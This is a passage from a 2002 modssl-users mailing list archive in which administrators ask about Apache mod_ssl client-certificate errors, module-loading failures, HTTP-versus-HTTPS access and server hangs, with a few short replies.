SSLVerifyClient 2
SSLVerifyDepth  10


    SSLOptions +StdEnvVars


    SSLOptions +StdEnvVars



SetEnvIf User-Agent ".*MSIE.*" \
         nokeepalive ssl-unclean-shutdown \
         downgrade-1.0 force-response-1.0


and after I show my certificate on the broser I get an error window an =
the log says so:

[Wed Jun  5 09:24:32 2002] [error] mod_ssl: Certificate Verification: =
Error (20): unable to get local issuer certificate
[Wed Jun  5 09:24:32 2002] [error] mod_ssl: SSL handshake failed (server =
443.psmi.com.br:443, client 172.16.2.47) (OpenSSL library error follows)
[Wed Jun  5 09:24:32 2002] [error] OpenSSL: error:140890B2:SSL =
routines:SSL3_GET_CLIENT_CERTIFICATE:no certificate returned

could someone help me? any idea?
thaks a lot





-------------------------------------------------------------------------=
--------
Edgard Janzen
Electrical Engineer (Electronic/Telecom.)
PSmi Editora Digital Ltda
-------------------------------------------------------------------------=
--------
E-mail: edgard@psmi.com.br
Home-page: http://www.psmi.com.br/
Address: Rua Brasilio Itiber=EA, 2928 - Sobreloja
Rebou=E7as - Curitiba - PR - 80250-160
Phone/Fax:(41) 333-3699
-------------------------------------------------------------------------=
--------

------=_NextPart_000_00DD_01C20C7F.422FBD40
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









Hi,


 


i=B4m trying to use Client =
Authentication with=20
certificates... so I=B4m using


apache_1.3.22


mod_ssl_2.8.5-1.3.22


openssl-0.9.6c


 


and the apache configurations is like=20
this


 


<VirtualHost=20
192.168.254.142:443>
    ServerAdmin suporte@psmi.com.br
 &nbs=
p; =20
DocumentRoot /home/www-data/443.psmi.com.br
    =
ServerName=20
443.psmi.com.br
    ScriptAlias /cgi-bin/=20
"/usr/local/apache/cgi-bin/"
    LogLevel=20
warn
    ErrorLog=20
/home/log-data/443.psmi.com.br-error_log
    CustomLog =

/home/log-data/443.psmi.com.br-access_log common
    =
CustomLog=20
/home/log-data/443.psmi.com.br-referer_log referer
    =

CustomLog /home/log-data/443.psmi.com.br-agent_log =
agent
   =20
ProxyPass / http://172.16.2.159:8080/443/<=
BR>   =20
ProxyPassReverse / http://172.16.2.159:8080/443/<=
BR>   =20
ProxyPass /misc_ http://172.16.2.159:8080/misc_=

   =20
ProxyPass /p_ http://172.16.2.159:8080/p_
&n=
bsp;  =20
ProxyVia on
SSLEngine on
SSLCertificateFile=20
/usr/local/apache-ssl/conf/chaves443/public.crt
SSLCertificateKeyFile =

/usr/local/apache-ssl/conf/chaves443/secureprivate.key
SSLCACertificat=
ePath=20
/usr/local/apache-ssl/conf/chaves443/
SSLCACertificateFile=20
/usr/local/apache-ssl/conf/chaves443/unicert.cer
SSLVerifyClient=20
2
SSLVerifyDepth  10


 


<Files ~=20
"\.(cgi|shtml|phtml|php3?)$">
    SSLOptions=20
+StdEnvVars
</Files>
<Directory=20
"/usr/local/apache-ssl/cgi-bin">
    SSLOptions=20
+StdEnvVars
</Directory>


 



SetEnvIf User-Agent ".*MSIE.*"=20
\
         nokeepalive=20
ssl-unclean-shutdown =
\
        =20
downgrade-1.0 =
force-response-1.0
</VirtualHost>


and after I show my certificate on the =
broser I get=20
an error window an the log says so:


 


[Wed Jun  5 09:24:32 2002] [error] =
mod_ssl:=20
Certificate Verification: Error (20): unable to get local issuer=20
certificate
[Wed Jun  5 09:24:32 2002] [error] mod_ssl: SSL =
handshake=20
failed (server 443.psmi.com.br:443, client 172.16.2.47) (OpenSSL library =
error=20
follows)
[Wed Jun  5 09:24:32 2002] [error] OpenSSL: =
error:140890B2:SSL=20
routines:SSL3_GET_CLIENT_CERTIFICATE:no certificate =
returned


could someone help me? any =
idea?


thaks a lot


 


 


 


 


 


----------------------------------------------------------------=
-----------------
Edgard=20
Janzen
Electrical Engineer (Electronic/Telecom.)
PSmi Editora =
Digital=20
Ltda
-----------------------------------------------------------------=
----------------
E-mail:=20
edgard@psmi.com.br
Home-page: =
http://www.psmi.com.br/
Address: =
Rua=20
Brasilio Itiber=EA, 2928 - Sobreloja
Rebou=E7as - Curitiba - PR -=20
80250-160
Phone/Fax:(41)=20
333-3699
-------------------------------------------------------------=
--------------------


------=_NextPart_000_00DD_01C20C7F.422FBD40--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun  6 02:53:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id CAA06123; Thu, 6 Jun 2002 02:52:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.scottwilson.com.hk id CAA06095; Thu, 6 Jun 2002 02:51:29 +0200 (MET DST)
Message-ID: <3321CF48237CD511909000B0D0F09DA370A5DD@EXCHANGE>
From: Conrad Ng 
To: modssl-users@modssl.org
Subject: How to disable part of the HTTP pages?
Date: Thu, 6 Jun 2002 08:47:24 +0800 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Conrad Ng 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Dear all

After I have implemented the SSL technology in my servers, I understand that
users can access securely under HTTPS://. However, they can still
access through HTTP://. Is there any way to block people from
accessing under HTTP:// ? I'm not meaning to block the whole port 80 but
only some pages, is it belong to the settings of Apache or what? Please
instruct. Thanks a lot!!

Regards

Conrad Ng


______________________________________________________

Scott Wilson Ltd celebrates its new name during its 50th year in Hong Kong!

This e-mail and any attachments to it are intended only for the party to
whom they are addressed. They may contain privileged and/or confidential
information. If you have received this transmission in error please notify
the sender immediately and delete any digital copies and destroy any paper
copies. Thank you.

Scott Wilson accepts no contractual liabilities or commitments arising from
this e-mail unless subsequently confirmed by fax or letter or as an e-mail
attachment giving company name, address, registration number and authorized
signatory.
______________________________________________________


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun  6 03:14:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id DAA07218; Thu, 6 Jun 2002 03:13:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from sitesontesting.com id DAA07206; Thu, 6 Jun 2002 03:12:27 +0200 (MET DST)
Message-Id: <200206060112.DAA07206@opensource.ee.ethz.ch>
Received: from WorldClient [127.0.0.1]
	by sitesontesting.com [127.0.0.1]
	with SMTP (MDaemon.PRO.v5.0.5.R)
	for ; Thu, 06 Jun 2002 06:46:15 +0530
Date: Thu, 06 Jun 2002 06:45:32 +0530
From: "Prachait Saxena" 
To: users@httpd.apache.org, isp-linux@isp-linux.com, modssl-users@modssl.org,
        modp.erl@perl.apache.org
Subject: LoadModule [Updated Problem]
X-Mailer: WorldClient 5.0.5
X-MDRemoteIP: 127.0.0.1
X-Return-Path: subscription@sitesontesting.com
X-MDaemon-Deliver-To: modssl-users@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Prachait Saxena" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello All,

I am using Apache 1.3.23 (Win32) + Win98 Conf.
and I would like to install SSL in this.

First I would like to tell you that, I had already read the documentation 
by Apache as well as OpenSSL. 

I am trying to LoadModule in the apache as.

LoadModule ssl_module   modules/mod_ssl.so #[SSL]
and I am getting a strange error as 

Cannot Load Module (PATH)/modules/mod_ssl.so (31) A device attached to 
the system in not functioning

Well, I have one TVTuner Card on my machine which is not working. I tries 
this also after removing this cared from the machine. 
One More this I did not have any netwrokcard on my machine, 

And i did not think that by about two reasons this probelm may occur.

One more problem in LoadModule of PHP and MySql is [ I mean the error is ]
Cannot Load Module (PATH)/modules/libphp4.dll (1157)  One of the library 
files need to run the application not found.

Strange ....

I have downloaded both apache and modules from the site.

I have two questions:

Can any one suggest me why i am getting such types of error ?

Will I have to compile the apache ? IF yes then suggest me a good 
documentation.

Will I have to compile the modules for PHP4 and SSL then How ?
Any Good Documentation ?


Bye and Have a nice day 

Prachait Saxena

WebMaster
SitesOnTesting.Com

If you do for other's !
Other's will do for you !!

Visit me at http://www.sitesontesting.com/prachait


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun  6 10:25:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA28136; Thu, 6 Jun 2002 10:24:19 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from marvin-lnx.staff.tdk.net id KAA28087; Thu, 6 Jun 2002 10:23:05 +0200 (MET DST)
Received: by marvin-lnx.staff.tdk.net (Postfix, from userid 500)
	id C45D1BD2C; Thu,  6 Jun 2002 08:14:29 +0200 (CEST)
Date: Thu, 6 Jun 2002 08:14:29 +0200
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: How to disable part of the HTTP pages?
Message-ID: <20020606061429.GA23693@marvin-lnx.staff.tdk.net>
Mail-Followup-To: modssl-users@modssl.org
References: <3321CF48237CD511909000B0D0F09DA370A5DD@EXCHANGE>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <3321CF48237CD511909000B0D0F09DA370A5DD@EXCHANGE>
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Thu, Jun 06, 2002 at 08:47:24AM +0800, Conrad Ng wrote:
> Dear all
> 
> After I have implemented the SSL technology in my servers, I understand that
> users can access securely under HTTPS://. However, they can still
> access through HTTP://. Is there any way to block people from
> accessing under HTTP:// ? I'm not meaning to block the whole port 80 but
> only some pages, is it belong to the settings of Apache or what? Please
> instruct. Thanks a lot!!
> 
Just make sure that DocumentRoot is not the same for both the HTTP and the
HTTPS server.

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun  6 10:54:20 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA29895; Thu, 6 Jun 2002 10:53:28 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from kaikoura.fel.tno.nl id KAA29766; Thu, 6 Jun 2002 10:52:32 +0200 (MET DST)
Received: by kaikoura.fel.tno.nl; id IAA20409; Thu, 6 Jun 2002 08:32:04 +0200 (MET DST)
Received: from fs1.fel.tno.nl(134.203.8.201) by kaikoura.fel.tno.nl via smap (V1.0)
	id xma020189; Thu, 6 Jun 02 08:31:34 +0200
Received: from pc1928.fel.tno.nl ([134.203.9.113]) by
          fs1.fel.tno.nl (Netscape Messaging Server 4.15) with SMTP id
          GX9U4O00.UIL for ; Thu, 6 Jun 2002
          08:31:36 +0200 
Received: FROM fel.tno.nl BY pc1928.fel.tno.nl ; Thu Jun 06 08:31:35 2002 +0200
Message-ID: <3CFF01C6.7B0D669@fel.tno.nl>
Date: Thu, 06 Jun 2002 08:31:34 +0200
From: "DG Speekenbrink" 
Organization: TNO-FEL
X-Mailer: Mozilla 4.75 [en]C-Netscape2000  (Win95; U)
X-Accept-Language: en,nl,fr,de
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: How to disable part of the HTTP pages?
References: <3321CF48237CD511909000B0D0F09DA370A5DD@EXCHANGE>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "DG Speekenbrink" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi Conrad, 

I'm not very familiar with webservers yet, but you might want to use a
"virtual host"
If you let your secure host serve files from
DocumentRoot="/htdocs/secure",
and let your non-secure host serve files from
DocumentRoot="/htdocs/non-secure",
then neither of those virtual hosts can access the wrong files.
(You will need to force one host (non-secure) on port 80, while you
force the other host (secure) to port 443.

I hope my explanation is helpful, and please, someone, correct me if I
see things the wrong way.

Dennis Speekenbrink


Conrad Ng wrote:
> 
> Dear all
> 
> After I have implemented the SSL technology in my servers, I understand that
> users can access securely under HTTPS://. However, they can still
> access through HTTP://. Is there any way to block people from
> accessing under HTTP:// ? I'm not meaning to block the whole port 80 but
> only some pages, is it belong to the settings of Apache or what? Please
> instruct. Thanks a lot!!
> 
> Regards
> 
> Conrad Ng
> 
> ______________________________________________________
> 
> Scott Wilson Ltd celebrates its new name during its 50th year in Hong Kong!
> 
> This e-mail and any attachments to it are intended only for the party to
> whom they are addressed. They may contain privileged and/or confidential
> information. If you have received this transmission in error please notify
> the sender immediately and delete any digital copies and destroy any paper
> copies. Thank you.
> 
> Scott Wilson accepts no contractual liabilities or commitments arising from
> this e-mail unless subsequently confirmed by fax or letter or as an e-mail
> attachment giving company name, address, registration number and authorized
> signatory.
> ______________________________________________________
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun  6 13:18:27 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA10948; Thu, 6 Jun 2002 13:17:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from orion.it-sec.de id NAA10922; Thu, 6 Jun 2002 13:16:34 +0200 (MET DST)
Received: by orion.ibh.de with Internet Mail Service (5.5.2653.19)
	id ; Thu, 6 Jun 2002 13:13:45 +0200
Message-ID: 
From: Jochen Vogel 
To: "'modssl-users@modssl.org'" 
Subject: Client Authentication Problem
Date: Thu, 6 Jun 2002 13:13:43 +0200 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jochen Vogel 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

hi,

i created a CA and a ClientKey witch i imported in my Client.
in httpd.conf i configured

Alias /test/ "/opt/www/test/"
    
        Options Indexes 
        Order allow,deny
        Allow from 192.168.0.142
        SSLVerifyClient require
        SSLVerifyDepth 1
     ./logs/ssl_engine_log <==
[06/Jun/2002 13:04:06 01186] [info]  Connection to child 5 established
(server suse:443, client 192.168.0.142)
[06/Jun/2002 13:04:06 01186] [info]  Seeding PRNG with 23177 bytes of
entropy
[06/Jun/2002 13:04:06 01186] [info]  Connection: Client IP: 192.168.0.142,
Protocol: SSLv3, Cipher: EXP-RC4-MD5 (40/128 bits)
[06/Jun/2002 13:04:06 01186] [info]  Connection to child 5 closed with
standard shutdown (server suse:443, client 192.168.0.142)

==> ./logs/access_log <==
192.168.0.142 - - [06/Jun/2002:13:04:07 +0200] "GET /test/ HTTP/1.1" 403 265

==> ./logs/error_log <==
[Thu Jun  6 13:04:07 2002] [error] mod_ssl: Re-negotiation handshake failed:
Not accepted by client!?
[Thu Jun  6 13:04:07 2002] [error] mod_ssl: SSL error on writing data
(OpenSSL library error follows)
[Thu Jun  6 13:04:07 2002] [error] OpenSSL: error:1409E0E5:SSL
routines:SSL3_WRITE_BYTES:ssl handshake failure

==> ./logs/ssl_engine_log <==
[06/Jun/2002 13:04:07 01187] [info]  Connection to child 6 established
(server suse:443, client 192.168.0.142)
[06/Jun/2002 13:04:07 01187] [info]  Seeding PRNG with 23177 bytes of
entropy
[06/Jun/2002 13:04:07 01187] [info]  Connection: Client IP: 192.168.0.142,
Protocol: SSLv3, Cipher: EXP-RC4-MD5 (40/128 bits)
[06/Jun/2002 13:04:07 01187] [info]  Initial (No.1) HTTPS request received
for child 6 (server suse:443)
[06/Jun/2002 13:04:07 01187] [info]  Requesting connection re-negotiation
[06/Jun/2002 13:04:07 01187] [info]  Awaiting re-negotiation handshake
[06/Jun/2002 13:04:07 01187] [error] Re-negotiation handshake failed: Not
accepted by client!?
[06/Jun/2002 13:04:07 01187] [error] SSL error on writing data (OpenSSL
library error follows)
[06/Jun/2002 13:04:07 01187] [error] OpenSSL: error:1409E0E5:SSL
routines:SSL3_WRITE_BYTES:ssl handshake failure
[06/Jun/2002 13:04:07 01187] [info]  Connection to child 6 closed with
unclean shutdown (server suse:443, client 192.168.0.142)

==> ./logs/ssl_request_log <==
[06/Jun/2002:13:04:07 +0200] 192.168.0.142 SSLv3 (NONE) "GET /test/
HTTP/1.1" 265

==> ./logs/access_log <==
192.168.0.142 - - [06/Jun/2002:13:04:09 +0200] "GET /test/ HTTP/1.1" 403 265

==> ./logs/error_log <==
[Thu Jun  6 13:04:09 2002] [error] mod_ssl: Certificate Verification: Error
(20): unable to get local issuer certificate
[Thu Jun  6 13:04:09 2002] [error] mod_ssl: Re-negotiation handshake failed:
Not accepted by client!?
[Thu Jun  6 13:04:09 2002] [error] mod_ssl: Certificate Verification: Error
(20): unable to get local issuer certificate
[Thu Jun  6 13:04:09 2002] [error] mod_ssl: SSL error on writing data
(OpenSSL library error follows)
[Thu Jun  6 13:04:09 2002] [error] OpenSSL: error:140890B2:SSL
routines:SSL3_GET_CLIENT_CERTIFICATE:no certificate returned

==> ./logs/ssl_engine_log <==
[06/Jun/2002 13:04:09 01188] [info]  Connection to child 7 established
(server suse:443, client 192.168.0.142)
[06/Jun/2002 13:04:09 01188] [info]  Seeding PRNG with 23177 bytes of
entropy
[06/Jun/2002 13:04:09 01188] [info]  Connection: Client IP: 192.168.0.142,
Protocol: SSLv3, Cipher: EXP-RC4-MD5 (40/128 bits)
[06/Jun/2002 13:04:09 01188] [info]  Initial (No.1) HTTPS request received
for child 7 (server suse:443)
[06/Jun/2002 13:04:09 01188] [info]  Requesting connection re-negotiation
[06/Jun/2002 13:04:09 01188] [info]  Awaiting re-negotiation handshake
[06/Jun/2002 13:04:09 01188] [error] Certificate Verification: Error (20):
unable to get local issuer certificate
[06/Jun/2002 13:04:09 01188] [error] Re-negotiation handshake failed: Not
accepted by client!?
[06/Jun/2002 13:04:09 01188] [error] Certificate Verification: Error (20):
unable to get local issuer certificate
[06/Jun/2002 13:04:09 01188] [error] SSL error on writing data (OpenSSL
library error follows)
[06/Jun/2002 13:04:09 01188] [error] OpenSSL: error:140890B2:SSL
routines:SSL3_GET_CLIENT_CERTIFICATE:no certificate returned
[06/Jun/2002 13:04:09 01188] [info]  Connection to child 7 closed with
unclean shutdown (server suse:443, client 192.168.0.142)

==> ./logs/ssl_request_log <==
[06/Jun/2002:13:04:09 +0200] 192.168.0.142 SSLv3 (NONE) "GET /test/
HTTP/1.1" 265

thx for help
Jochen

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun  6 13:37:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA11788; Thu, 6 Jun 2002 13:36:23 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id NAA11754; Thu, 6 Jun 2002 13:35:18 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 6ED7D4CE779; Thu,  6 Jun 2002 13:35:15 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 5C50628AD9; Thu,  6 Jun 2002 12:00:25 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from localhost id EAA11229; Thu, 6 Jun 2002 04:39:06 +0200 (MET DST)
Date: Thu, 6 Jun 2002 04:39:06 +0200 (MET DST)
Message-Id: <200206060239.EAA11229@opensource.ee.ethz.ch>
From: modssl-bugdb@modssl.org
To: modssl-users@modssl.org
Subject: [BugDB] Error Starting Apache when trying to use mod_ssl (PR#712)
Cc: modssl-bugdb@modssl.org
X-Loop: modssl-bugdb@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: modssl-bugdb@modssl.org
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Full_Name: Luke Whitford
Version: 2.8.8
OS: Win98
Submission from: (NULL) (203.59.68.234)


When trying to start apache (1.3.24) with the mod_ssl module being loaded the
following error occurs:

C:\Program Files\Apache Group\Apache>apache
Syntax error on line 195 of c:/program files/apache
group/apache/conf/httpd.conf
:
Cannot load c:/program files/apache group/apache/modules/mod_ssl.so into
server:
 (31) A device attached to the system is not functioning:

Note the errors or messages above, and press the  key to exit.  0....

Any ideas on how to remedy the situation would be greatly appreciated

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun  6 13:37:17 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA11809; Thu, 6 Jun 2002 13:36:39 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id NAA11751; Thu, 6 Jun 2002 13:35:17 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 624484CE776; Thu,  6 Jun 2002 13:35:15 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 0BBB528AD0; Thu,  6 Jun 2002 12:00:23 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from demetrius.hosting.pacbell.net id EAA10498; Thu, 6 Jun 2002 04:21:03 +0200 (MET DST)
Received: from IMRANPC (adsl-64-172-38-74.dsl.snfc21.pacbell.net [64.172.38.74])
	by demetrius.hosting.pacbell.net
	id WAA21250; Wed, 5 Jun 2002 22:20:40 -0400 (EDT)
	[ConcentricHost SMTP Relay 1.14]
From: "Imran Badr" 
To: 
Subject: Hardware key storage
Date: Wed, 5 Jun 2002 19:18:26 -0700
Message-ID: <00dc01c20d00$71955b90$5010a8c0@IMRANPC>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="US-ASCII"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2911.0)
In-Reply-To: 
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Imran Badr" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,
I am sorry if this question has been asked before in this group. I wanted to
find out what would be required to use private keys stored in hardware with
apache and modssl ? Modssl code looks for private key file in the host
machine and calls use_private_key() sort of function of openssl to store
private key in ssl context. Is it possible to use modssl with apache when
keys are created in tamper proof hardware and never leaves that? Is there
any patch to do that?

Thanks for any advice.
Imran.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun  6 13:37:30 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA11825; Thu, 6 Jun 2002 13:36:56 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id NAA11743; Thu, 6 Jun 2002 13:35:16 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id EE9394CE742; Thu,  6 Jun 2002 13:35:14 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 2520828698; Thu,  6 Jun 2002 11:56:17 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.srar.com id WAA22854; Wed, 5 Jun 2002 22:12:32 +0200 (MET DST)
Received: from srar.com (cris.srar.com [209.232.160.4])
	by mail.srar.com (8.11.6/8.11.6) with ESMTP id g55K4dM25261;
	Wed, 5 Jun 2002 13:04:40 -0700
Message-ID: <3CFE7204.3060307@srar.com>
Date: Wed, 05 Jun 2002 13:18:12 -0700
From: "Loren K. Louthan" 
Organization: Southland Regional Association of REALTORS(R)
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.7) Gecko/20011226
X-Accept-Language: en-us
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Server stops serving
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Loren K. Louthan" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello,

Hopefully, this will ring a bell for someone:

My secure server starts up with no problem. It serves pages for 5 mins.,
10 mins, sometimes even a half-hour. Eventually, however, it stops
serving pages. The clients will see "opening page *server-address* ", or
"Requesting page from *server-address*". But the page never shows up, it
is blank.And we don't get any "Time-out" error messages, either.

At about the time this happens, I get the following in my ssl_engine_log
file:

[05/Jun/2002 11:22:35 09388] [info]  Connection to child 10 established
(server www.MYDOMAINNAME.com:443, xxx.xxx.xxx.xxx)
[05/Jun/2002 11:22:35 09388] [info]  Seeding PRNG with 136 bytes of entropy
[05/Jun/2002 11:22:36 09388] [warn]  Failed to acquire global mutex lock
[05/Jun/2002 11:22:36 09388] [warn]  Failed to release global mutex lock

Now, in %server-root%/logs (the path specified in httpd.conf) there is a
ssl_mutex file, but it is empty.

There is no relevant error in the either server's or system error logs.

Server config is:
Apache Version:		2.0.36
mod_ssl version:	2.8.7-4
openssl version		0.9.6b-18

System is RedHat 7.3, Apache was built from source tarball, openssl is
from the RPM that installs w/RH 7.3

I can send httpd.conf settings, if necesarry.

Thanks in advance,
-- 
Loren K Louthan | tel: 818 786 2110  |  AIM: LorenSRAR
Network Administrator
Southland Regional Association of REALTORS /
CRISNet Regional MLS


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun  6 15:02:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA18083; Thu, 6 Jun 2002 15:01:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id PAA18061; Thu, 6 Jun 2002 15:00:46 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 5E66B4CE763; Thu,  6 Jun 2002 15:00:46 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 2EAEE28698; Thu,  6 Jun 2002 14:27:51 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from pr1-exch01.payroll1.com id OAA15386; Thu, 6 Jun 2002 14:19:50 +0200 (MET DST)
Received: by PR1-EXCH01 with Internet Mail Service (5.5.2653.19)
	id ; Thu, 6 Jun 2002 08:16:47 -0400
Received: from ameritech.net (10.0.0.125 [10.0.0.125]) by pr1-exch01.payroll1.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13)
	id K0KRBMWY; Thu, 6 Jun 2002 08:16:40 -0400
From: Thomas Gagne 
To: modssl-users@modssl.org
Message-ID: <3CFF5367.8000905@ameritech.net>
Date: Thu, 06 Jun 2002 08:19:51 -0400
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0rc2) Gecko/20020513 Netscape/7.0b1
X-Accept-Language: en-us, en
MIME-Version: 1.0
Subject: Re: Server stops serving
References: <3CFE7204.3060307@srar.com>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Thomas Gagne 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

There was a post in usenet about this issue.  I'll forward one of the 
last messages with some of the history.  It should help.

Loren K. Louthan wrote:

> Hello,
>
> Hopefully, this will ring a bell for someone:
>
> My secure server starts up with no problem. It serves pages for 5 mins.,
> 10 mins, sometimes even a half-hour. Eventually, however, it stops
> serving pages. The clients will see "opening page *server-address* ", or
> "Requesting page from *server-address*". But the page never shows up, it
> is blank.And we don't get any "Time-out" error messages, either.
>
> At about the time this happens, I get the following in my ssl_engine_log
> file:
>
> [05/Jun/2002 11:22:35 09388] [info]  Connection to child 10 established
> (server www.MYDOMAINNAME.com:443, xxx.xxx.xxx.xxx)
> [05/Jun/2002 11:22:35 09388] [info]  Seeding PRNG with 136 bytes of 
> entropy
> [05/Jun/2002 11:22:36 09388] [warn]  Failed to acquire global mutex lock
> [05/Jun/2002 11:22:36 09388] [warn]  Failed to release global mutex lock
>
> Now, in %server-root%/logs (the path specified in httpd.conf) there is a
> ssl_mutex file, but it is empty.
>
> There is no relevant error in the either server's or system error logs.
>
> Server config is:
